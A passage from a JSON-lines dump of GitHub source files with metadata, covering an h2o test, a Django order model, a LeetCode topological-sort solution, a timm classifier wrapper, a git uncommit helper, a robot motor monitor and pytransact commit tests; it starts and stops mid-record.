try: # try to access metalearner method for GBM should encounter exception\n print(type(gbm_h2o.metalearner()))\n exit(1) # should have failed the test\n except Exception as ex:\n print(ex)\n\n\n # test to for method metalearner() can be found in pyunit_stackedensemble_regression.py\n # test to for method levelone_frame_id() can be found in pyunit_stackedensemble_levelone_frame.py\n # There is no need to add one here.\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_5023_rm_metalearner)\nelse:\n pubdev_5023_rm_metalearner()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_jira/pyunit_pubdev_5023_rm_metalearner.py", "file_name": "pyunit_pubdev_5023_rm_metalearner.py", "file_ext": "py", "file_size_in_byte": 1175, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.import_file", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 10, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 10, "usage_type": "name"}, {"api_name": "h2o.estimators.gbm.H2OGradientBoostingEstimator", "line_number": 19, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 34, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "10685190001", "text": "from django.db import models\nfrom product.models import Product\nfrom customer.models import Customer\nfrom stock.models import Stock\nfrom datetime import datetime\n\n\nclass Order(models.Model):\n stock = models.ForeignKey(\n Stock, on_delete=models.DO_NOTHING, verbose_name=\"商品\")\n customer = models.ForeignKey(\n Customer, on_delete=models.DO_NOTHING, verbose_name=\"客户\")\n quantity = models.IntegerField(blank=True, default=0, verbose_name=\"数量\")\n quantity_unit = models.CharField(\n max_length=20, blank=True, default='千克', verbose_name='数量单位')\n price = models.DecimalField(\n decimal_places=2, max_digits=10,\n blank=True, default=0.0, verbose_name='单价')\n total_price = models.DecimalField(\n decimal_places=2, max_digits=10,\n blank=True, default=0.0, verbose_name='总价')\n time_on_order = models.DateTimeField(blank=True, default=datetime.now)\n\n class Meta:\n verbose_name = \"订单\"\n verbose_name_plural = verbose_name\n\n def __str__(self):\n return self.stock\n", "repo_name": "hujiyi/mystore", "sub_path": "order/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1077, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 8, "usage_type": "name"}, {"api_name": "stock.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 9, "usage_type": "call"}, {"api_name": "stock.models.Stock", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.db.models.DO_NOTHING", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "customer.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 11, "usage_type": "call"}, {"api_name": "customer.models.Customer", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.DO_NOTHING", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 12, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 13, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 22, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "72324632833", "text": "from typing import List\nfrom collections import defaultdict, deque\n\n# 1.24 first try,debug以后写出来了了\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n graph = defaultdict(list)\n count = [0] * numCourses\n res = []\n q = deque()\n\n # build graph & count outdegree\n for c, req in prerequisites:\n graph[req].append(c)\n count[c] += 1\n # push 0 outdegree to res and edit count\n for i, v in enumerate(count):\n if v == 0:\n q.append(i)\n while q:\n req = q.popleft()\n res.append(req)\n for c in graph[req]:\n count[c] -= 1\n if count[c] == 0:\n q.append(c)\n # graph[req].remove(c) #一开始有这行迟迟过不了,remove from graph是没必要的\n # return res if len(res) == numCourses else []\n return res if len(res) == numCourses else []", "repo_name": "deezeey/LC", "sub_path": "src/solutions/210_course-schedule-ii.py", "file_name": "210_course-schedule-ii.py", "file_ext": "py", "file_size_in_byte": 1021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 7, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "6315163949", "text": "# Code written by Kadir Nar, 2023\n\nimport urllib\n\nimport timm\nimport torch\nfrom PIL import Image\nfrom timm.data import resolve_data_config\nfrom timm.data.transforms_factory import create_transform\n\n\nclass TimmClassificationModel:\n def __init__(\n self,\n model_name: str,\n ):\n self.model_name = model_name\n self.load()\n\n def load_model(self):\n self.model = timm.create_model(self.model_name, pretrained=True)\n self.model.eval()\n\n def load_classes(self):\n url, filename = (\n \"https://raw.githubusercontent.com/pytorch/hub/master/imagenet_classes.txt\",\n \"imagenet_classes.txt\",\n )\n urllib.request.urlretrieve(url, filename)\n with open(\"imagenet_classes.txt\", \"r\") as f:\n self.categories = [s.strip() for s in f.readlines()]\n\n def load_transform(self):\n config = resolve_data_config({}, model=self.model)\n self.transform = create_transform(**config)\n\n def load(self):\n self.load_model()\n self.load_transform()\n self.load_classes()\n\n def predict(self, img_path):\n img = Image.open(img_path).convert(\"RGB\")\n tensor = self.transform(img).unsqueeze(0)\n with torch.no_grad():\n out = self.model(tensor)\n probabilities = torch.nn.functional.softmax(out[0], dim=0)\n top5_prob, top5_catid = torch.topk(probabilities, 5)\n\n return [(self.categories[top5_catid[i]], top5_prob[i].item()) for i in range(top5_prob.size(0))]\n", "repo_name": "kadirnar/classifyhub", "sub_path": "classifyhub/libhub/timm_models.py", "file_name": "timm_models.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "timm.create_model", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request.urlretrieve", "line_number": 29, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 29, "usage_type": "attribute"}, {"api_name": "timm.data.resolve_data_config", "line_number": 34, "usage_type": "call"}, {"api_name": "timm.data.transforms_factory.create_transform", "line_number": 35, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.topk", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "7525085665", "text": "import git\nfrom .add import git_unadd\n\ndef uncommit():\n try:\n # Initialize a git object for the current directory\n repo = git.Repo(\".\")\n \n # Check the number of commits\n num_commits = len(list(repo.iter_commits()))\n \n if num_commits > 1:\n # Get the last commit message\n last_commit_message = repo.head.commit.message\n \n # Perform the soft reset\n repo.git.reset(\"--soft\", \"HEAD~1\")\n git_unadd()\n \n print(f\"Successfully undone '{last_commit_message}'.\")\n elif num_commits == 1:\n # Get the last commit message\n last_commit_message = repo.head.commit.message\n \n # Delete the last commit\n repo.git.update_ref(\"-d\", \"HEAD\")\n git_unadd()\n \n print(f\"Successfully deleted the only commit '{last_commit_message}'.\")\n else:\n print(\"No commits to undo.\")\n \n except git.InvalidGitRepositoryError:\n print(\"You're not in a Git repository.\")\n except git.GitCommandError as e:\n print(f\"Failed to undo the last commit. Error: {e}\")\n\nif __name__ == \"__main__\":\n uncommit()\n\n", "repo_name": "brainspoof/goodgit", "sub_path": "goodgit/commit/uncommit.py", "file_name": "uncommit.py", "file_ext": "py", "file_size_in_byte": 1242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "git.Repo", "line_number": 7, "usage_type": "call"}, {"api_name": "add.git_unadd", "line_number": 18, "usage_type": "call"}, {"api_name": "add.git_unadd", "line_number": 27, "usage_type": "call"}, {"api_name": "git.InvalidGitRepositoryError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "git.GitCommandError", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "40066211907", "text": "import sys\nimport itertools as it\nimport numpy as np\nfrom pypot.creatures import PoppyHumanoid as PH\n\nperiod = 10**6\nph = PH()\nnames = [m.name for m in ph.motors]\n\ntry:\n for i in it.count():\n for t in range(period): pass\n\n load = [m.present_load for m in ph.motors]\n voltage = [m.present_voltage for m in ph.motors]\n temperature = [m.present_temperature for m in ph.motors]\n\n print(\"\\n%d\" % i)\n print(\"load = %.2f-%.2f (%s-%s)\" % (\n np.min(load), np.max(load), names[np.argmin(load)], names[np.argmax(load)]))\n print(\"volt = %.2f-%.2f (%s-%s)\" % (\n np.min(voltage), np.max(voltage), names[np.argmin(voltage)], names[np.argmax(voltage)]))\n print(\"temp = %.2f-%.2f (%s-%s)\" % (\n np.min(temperature), np.max(temperature), names[np.argmin(temperature)], names[np.argmax(temperature)]))\n\nexcept:\n ph.close()\n sys.exit()\n\n", "repo_name": "garrettkatz/poppy-muffin", "sub_path": "scripts/monitor_load.py", "file_name": "monitor_load.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pypot.creatures.PoppyHumanoid", "line_number": 7, "usage_type": "call"}, {"api_name": "itertools.count", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "2880276114", "text": "import bson, logging, os, gridfs, py, pymongo\nfrom bson.objectid import ObjectId\n\nfrom pymongo.errors import OperationFailure\nfrom pytransact.difftoi import DiffTOI\nfrom pytransact import commit, mongo\nfrom pytransact.contextbroker import ContextBroker\nfrom pytransact.exceptions import *\nfrom pytransact.object.attribute import BlobVal\nfrom pytransact.testsupport import ContextTests, Fake, RuntimeContext, Time\nimport blm\n\ndef setup_module(mod):\n from blm import fundamental\n mod.blm = blm\n blm.addBlmPath(os.path.join(os.path.dirname(__file__), 'blm'))\n from blm import testcommit\n\n logging.basicConfig()\n commit.log.setLevel(logging.DEBUG)\n\ndef teardown_module(mod):\n blm.removeBlmPath(os.path.join(os.path.dirname(__file__), 'blm'))\n blm.clear()\n\n\nclass BaseCommitContextTests(ContextTests):\n\n def setup_method(self, method):\n super(BaseCommitContextTests, self).setup_method(method)\n with RuntimeContext(self.database):\n self.user = blm.fundamental.AccessHolder(super=[True])\n self.sync()\n\n def newcontext(self, user=None):\n if user is None:\n user = self.user\n ctx = commit.CommitContext(self.database, user)\n ctx.setMayChange(True)\n ContextBroker().pushContext(ctx)\n return ctx\n\n def commit(self):\n ctx = ContextBroker().context\n ctx.runCommit([], interested=None)\n ContextBroker().popContext()\n self.sync()\n self.newcontext()\n\n def set_primary(self):\n self._database = self.database.client.get_database(\n self.database.name, read_preference=pymongo.ReadPreference.PRIMARY)\n\n def find(self, query, collection=None):\n collection = collection or self.database.tois\n return mongo.find(collection, query)\n\n def find_one(self, query, collection=None):\n collection = collection or self.database.tois\n return mongo.find_one(collection, query)\n\n\nclass TestCommitContext(BaseCommitContextTests):\n\n def test_wait_for_commit(self):\n self._commit('interested')\n result, error = commit.wait_for_commit(self.database, 'interested',\n timeout=1)\n assert result\n assert not error\n\n def test_wait_for_commit_timeout(self):\n py.test.raises(commit.Timeout, commit.wait_for_commit,\n self.database, 'interested', timeout=0.1)\n\n class MyException(Exception): pass\n\n py.test.raises(MyException, commit.wait_for_commit,\n self.database, 'interested', onfail=MyException, timeout=0.1)\n\n\n def test_simple(self):\n cctx = commit.CommitContext(self.database)\n\n def test_createToi(self):\n cctx = self.newcontext()\n toi = cctx.createToi(blm.testcommit.Test, cctx.newId(),\n {'name': ['test']})\n\n assert toi.name == ['test']\n assert toi.__class__._query(name='test').run()[0] is toi\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n ContextBroker().popContext()\n cctx.runCommit([])\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n def test_canWrite_new_toi(self):\n user = blm.fundamental.AccessHolder()\n cctx = self.newcontext(user=user)\n toi = cctx.createToi(blm.testcommit.Test, cctx.newId(),\n {'name': ['test']})\n self.sync()\n assert toi.name == ['test']\n assert toi.__class__._query(name='test').run()[0] is toi\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n ContextBroker().popContext()\n cctx.runCommit([])\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n def test_changeToi(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n\n cctx = self.newcontext()\n # New context, so we have to look it up again\n toi = blm.testcommit.Test._query().run()[0]\n\n toi(extra=['fOo'])\n\n assert toi.extra == ['fOo']\n assert toi.__class__._query(extra='fOo').run()[0] is toi\n assert toi.__class__._query(extra=None).run() == []\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi.get('extra',[]) == []\n\n ContextBroker().popContext()\n cctx.runCommit([])\n\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi['extra'] == ['fOo']\n\n def test_changeToi_with_nop_change(self):\n toi = blm.testcommit.Test(name=['test'])\n self.sync()\n\n cctx = self.newcontext()\n # New context, so we have to look it up again\n toi = blm.testcommit.Test._query(_attrList=['name']).run()[0]\n\n toi(name=['fOo'])\n\n assert toi.name == ['fOo']\n assert toi.__class__._query(name='fOo').run()[0] is toi\n assert toi.__class__._query(name=None).run() == []\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi.get('extra',[]) == []\n\n toi(name=['test']) # Restore to original value\n\n ContextBroker().popContext()\n commit = cctx.runCommit([])\n assert commit.state != 'failed'\n\n dbtoi, = list(self.database.tois.find({'_toc': 'testcommit.Test'}))\n assert dbtoi['name'] == ['test']\n\n def test_deleteToi(self):\n toi = blm.testcommit.Test(name=['text'])\n print(toi, toi.__class__)\n self.sync()\n\n cctx = self.newcontext()\n toi, = blm.testcommit.Test._query().run()\n toi._delete()\n print(toi, toi.__class__)\n assert toi.__class__._query().run() == []\n self.sync()\n assert self.find({'_toc': 'testcommit.Test'}).count() == 1\n\n ContextBroker().popContext()\n cctx.runCommit([])\n\n assert self.find({'_toc': 'testcommit.Test'}).count() == 0\n\n def test_runQuery_simple(self):\n # This is actually already tested by the queries\n # in the above *Toi tests, but we make an explicit test\n # anyway\n blm.testcommit.Test(name=['text'])\n self.sync()\n cctx = self.newcontext()\n\n toi, = blm.testcommit.Test._query(name='text').run()\n name = toi.name[0]\n assert name == 'text'\n\n def test_runQuery_subQuery(self):\n foo = blm.testcommit.Test(name=['foo'])\n blm.testcommit.Test(name=['text'], toiref=[foo])\n self.commit()\n cctx = self.newcontext()\n q = blm.testcommit.Test._query(\n toiref=blm.testcommit.Test._query(name='foo'))\n toi, = q.run()\n assert toi.name == ['text']\n\n def test_requestAttribute(self):\n cctx = self.newcontext()\n\n toi = blm.fundamental.AccessHolder._query().run()[0]\n attrVal = cctx.requestAttribute(toi, blm.fundamental.AccessHolder.super)\n assert attrVal == [True]\n\n toi = blm.testcommit.Test(name=['text'])\n attrVal = cctx.requestAttribute(toi, blm.testcommit.Test.name)\n assert attrVal == ['text']\n\n def test_requestAttribute_with_toi_deleted(self):\n cctx = self.newcontext()\n\n toi = blm.testcommit.Test(name=['foo'])\n toi._delete()\n\n py.test.raises(RuntimeError, cctx.requestAttribute, toi, None)\n\n def test_preloadAttributes(self):\n py.test.skip('Not really useful, remove it?')\n\n def test_validateAttrValues_simple(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.RestTest(name=['test'])\n value = ['foo']\n rval = cctx.validateAttrValues(toi1, toi1.name, value)\n assert rval == value\n py.test.raises(ClientError, cctx.validateAttrValues, toi1,\n toi1.name, [])\n py.test.raises(ClientError, cctx.validateAttrValues, toi1,\n toi1.name, ['foo', 'bar'])\n\n def test_validateAttrValues_readonly(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n None, blm.testcommit.Test.readonly, ['foo'])\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.readonly, ['foo'])\n\n def test_validateAttrValues_computed(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n None, blm.testcommit.Test.computed, ['foo'])\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.computed, ['foo'])\n\n def test_validateAttrValues_unchangeable(self):\n toi1 = blm.testcommit.Test(name=['test'])\n cctx = self.newcontext()\n\n value = ['foo']\n rval = cctx.validateAttrValues(None, blm.testcommit.Test.unchangeable,\n ['foo'])\n assert value == rval\n\n toi1 = blm.testcommit.Test._query(name='test').run()[0]\n # XXX unchangeable is tested against what (if any) change\n # has been made in the toi!\n toi1.unchangeable = ['foo']\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, blm.testcommit.Test.unchangeable, None)\n\n def test_validateAttrValues_weakref(self):\n # Check that deleted tois are dropped\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Test(name=['toi2'])\n toi3 = blm.testcommit.Test(name=['toi3'])\n toi3._delete()\n\n value = [toi1, toi2, toi3]\n rval = cctx.validateAttrValues(toi1, blm.testcommit.Test.weakref,\n value)\n assert rval == [toi1, toi2]\n\n def test_validateAttrValues_reorder(self):\n toi1 = blm.testcommit.Test(name=['toi1'], reorder=['a','b','c'])\n self.sync()\n\n cctx = self.newcontext()\n toi1, = blm.testcommit.Test._query(name='toi1').run()\n\n py.test.raises(ClientError, cctx.validateAttrValues,\n toi1, toi1.reorder, ['a'])\n\n value = ['c','b','a']\n rval = cctx.validateAttrValues(toi1, toi1.reorder, value)\n assert value == rval\n\n def test_validateAttrValues_unique(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'],\n unique=['toi1'])\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.unique, ['toi1'])\n\n value = ['toi1']\n rval = cctx.validateAttrValues(toi1, toi1.unique, value)\n assert rval == value\n\n def test_validateAttrValues_simple_toitype(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.simpleToiType, [toi1])\n toi1.name = ['test']\n value = [toi1]\n rval = cctx.validateAttrValues(None, toi1.simpleToiType, value)\n assert value == rval\n\n def test_validateAttrValues_toiref_exists(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n phantom = blm.testcommit.Test._create(ObjectId())\n value = [phantom]\n rval = cctx.validateAttrValues(None, toi1.toiref, value, pre=True)\n assert rval == value\n\n # do not accept phantom tois in database\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.toiref, value, pre=False)\n\n def test_validateAttrValues_complex_toitype(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Other(name=['toi2'])\n toi3 = blm.testcommit.Test(name=['toi3'],\n toiref = [toi2])\n\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.complexToiType, [ toi1 ])\n\n toi1.complexToiType = [toi3]\n py.test.raises(ClientError, cctx.validateAttrValues, None,\n toi1.complexToiType, [ toi3 ])\n\n q = blm.testcommit.Test._query(toiref =\n blm.testcommit.Other._query(name='test'),\n id = [toi3])\n\n toi2.name = ['test']\n value = [toi3]\n rval = cctx.validateAttrValues(None, toi1.complexToiType, value)\n assert rval == value\n\n def test_validateAttrValues_toirefmap(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Test(name=['toi1'])\n toi2 = blm.testcommit.Test(name=['toi2'],\n toirefmap={'toi1': toi1})\n\n value = {'foo': toi2}\n rval = cctx.validateAttrValues(None, toi1.toirefmap, value)\n assert rval == value\n\n def test_findRelatedAttr(self):\n cctx = self.newcontext()\n\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related()\n\n rval = cctx.findRelatedAttr(toi1, toi2, toi1.related)\n assert rval == toi2.other\n\n def test_updateRelations(self):\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related(name=['related'],\n other=[toi1])\n toi1.related = [toi2] # Simple commit context doesn't fix this\n self.sync()\n\n cctx = self.newcontext()\n toi1 = blm.testcommit.Other._query().run()[0]\n\n toi2 = blm.testcommit.Related._query(name=['related']).run()[0]\n\n toi3 = blm.testcommit.Related(name=['releated3'],\n other=[toi1])\n\n self.commit()\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi2, toi3]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2.other = []\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2._orgAttrData['other'] = [] # pretend it changed in DB\n\n toi2.other = [toi1]\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3, toi2]\n\n toi2 = blm.testcommit.Related._query(id=toi2.id).run()[0]\n toi2._orgAttrData['other'] = [toi1]\n toi2.other = []\n toi2._delete()\n self.commit()\n\n toi1 = blm.testcommit.Other._query(id=toi1.id).run()[0]\n assert toi1.related == [toi3]\n\n def test_commitRelations(self):\n self.newcontext()\n toi1 = blm.testcommit.Other(name=['other'])\n toi2 = blm.testcommit.Related(name=['related'], other=[toi1])\n self.commit()\n\n toi1, = blm.testcommit.Other._query(id=toi1.id).run()\n assert toi1.related == [toi2]\n\n toi2, = blm.testcommit.Related._query(id=toi2.id).run()\n toi2.other = []\n toi2._delete()\n self.commit()\n\n toi1, = blm.testcommit.Other._query(id=toi1.id).run()\n assert toi1.related == []\n\n self.newcontext()\n toi1 = blm.testcommit.OtherWeak()\n toi2 = blm.testcommit.Related(name=['related'], weak=[toi1])\n self.commit()\n\n toi1, = blm.testcommit.OtherWeak._query(id=toi1.id).run()\n assert toi1.related == [toi2]\n\n toi2, = blm.testcommit.Related._query(id=toi2.id).run()\n toi2._delete()\n self.commit()\n\n toi1, = blm.testcommit.OtherWeak._query(id=toi1.id).run()\n assert toi1.related == []\n\n def test_updateBlobs(self):\n self.newcontext()\n val1 = BlobVal('foo')\n val1.large_blob = 2\n toi = blm.testcommit.Test(blob=[val1])\n self.commit()\n\n assert val1.references == {toi.id[0]}\n\n self.newcontext()\n\n ref = ObjectId()\n val1.addref(ref)\n self.sync()\n\n toi, = blm.testcommit.Test._query().run()\n\n val1 = toi.blob[0]\n val2 = BlobVal('foo')\n val2.large_blob = 2\n toi.blob = [val2]\n self.commit()\n self.sync()\n\n assert val1.references == {ref}\n assert val2.references == {toi.id[0]}\n\n self.newcontext()\n\n toi, = blm.testcommit.Test._query().run()\n val2 = toi.blob[0]\n\n toi._delete()\n self.commit()\n self.sync()\n\n assert val2.references == set()\n\n py.test.raises(Exception, gridfs.GridFS(self.database, 'blobvals').get, val2.value._id)\n\n\n def test_runAfterCommit(self):\n py.test.xfail(\"post-commit hooks not supported\")\n callbackCalled = []\n def callback(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n\n class Op(commit.OperateBase):\n def checkPermissions(self, context):\n pass\n def operate(self, context):\n context.runAfterCommit(callback, 42, foo='bar')\n\n cctx = commit.CommitContext(self.database)\n ContextBroker().pushContext(cctx)\n cctx.setMayChange(True)\n\n results = cctx.runCommit([Op()])\n\n assert callbackCalled == [(None, (42,), {'foo':'bar'})]\n\n def test_runAfterCommitFailing(self):\n py.test.xfail(\"post-commit hooks not supported\")\n callbackCalled = []\n def callback(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n raise RuntimeError('error')\n def callback2(tid, *args, **kw):\n callbackCalled.append((tid, args, kw))\n\n class Op(commit.OperateBase):\n def checkPermissions(self, context):\n pass\n def operate(self, context):\n context.runAfterCommit(callback, 42, foo='bar')\n context.runAfterCommit(callback2, 43)\n\n cctx = commit.CommitContext(self.database)\n ContextBroker().pushContext(cctx)\n cctx.setMayChange(True)\n\n results = cctx.runCommit([Op()])\n\n assert callbackCalled == [(None, (42,), {'foo':'bar'}),\n (None, (43,), {})]\n\n def test_notifyChanges_being_called(self):\n result = []\n def notifyChanges(commits):\n result.append([c._id for c in commits])\n\n cctx = self.newcontext()\n cctx.id = None # cheat - pretend that this commit is unhandled\n commit1 = cctx.createCommit([], [])\n commit1.save(self.database)\n ContextBroker().popContext()\n\n cctx = self.newcontext()\n commit2 = cctx.createCommit([], [])\n ContextBroker().popContext()\n\n cctx.notifyChanges = notifyChanges\n cctx.processCommits(commit2)\n\n expected = [[commit2._id, commit1._id]]\n assert result == expected\n\n def test_runCommit(self):\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n cctx = self.newcontext()\n cctx.runCommit([op])\n\n def test_runCommit_error(self):\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n cmt = cctx.runCommit([op])\n assert cmt.error\n\n def test_runCommit_createCommit_fail(self, monkeypatch):\n def createCommit(*args, **kw):\n kw['args'] = args\n kw['_id'] = ObjectId()\n return kw\n\n op = commit.CallBlm('testcommit', 'simple', [['bar']])\n cctx = self.newcontext()\n\n monkeypatch.setattr(cctx, 'createCommit', createCommit)\n\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n cmt = cctx.runCommit([op], processCommits=False)\n assert cmt.error.message == 'broken'\n\n def test_runCommit_error_with_interest(self):\n op = commit.CallBlm('testcommit', 'broken', [])\n cctx = self.newcontext()\n interested = ObjectId()\n cmt = cctx.runCommit([op], interested=interested)\n assert cmt.error\n self.sync()\n stored = mongo.find_one(self.database.commits, {'_id': cmt._id})\n assert type(cmt.error) == type(stored['error'])\n assert cmt.error.args == stored['error'].args\n\n def test_createCommit(self):\n cctx = self.newcontext()\n toi1 = blm.testcommit.Test(name=['foo'])\n toi2 = blm.testcommit.Test(name=['bar'])\n toi3 = blm.testcommit.Test(name=['baz'])\n toi1._orgAttrData = { 'name': ['apa'] }\n\n cctx.changedTois = { toi1.id[0]: toi1 }\n cctx.newTois = { toi2.id[0]: toi2 }\n cctx.deletedTois = {toi3.id[0]: toi3}\n cctx.indexData = [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n bval1 = BlobVal('x')\n bval2 = BlobVal('y')\n bval3 = BlobVal('z')\n\n cctx.addedBlobVals = { str(toi1.id[0]): [bval1]}\n cctx.deletedBlobVals = { str(toi2.id[0]): [bval2]}\n\n ops = [commit.CallBlm('foo', 'bar', [[bval3]])]\n\n cmt = cctx.createCommit(ops, [['result']], interested='interested')\n\n assert cmt.user == cctx.user != None\n assert set(cmt.deletedTois) == set([toi3.id[0]])\n diff = DiffTOI()\n diff.setAttrDiff(toi2.__class__, toi2.id[0],\n {'name': []}, {'name': ['bar']})\n assert cmt.newTois == [diff]\n diff = DiffTOI()\n diff.setAttrDiff(toi1.__class__, toi1.id[0],\n {'name': ['apa']}, {'name': ['foo']})\n assert cmt.changedTois == [diff]\n assert cmt.indexData == [(toi1.id[0], {'toid': toi1.id[0],\n 'data': ['foo', 'bar']})]\n assert cmt.addedBlobVals == { str(toi1.id[0]): [bval1]}\n assert cmt.deletedBlobVals == { str(toi2.id[0]): [bval2]}\n assert cmt.operations == ops\n assert cmt.results == [['result']]\n assert cmt.interested == 'interested'\n assert cmt.error is None\n\n assert 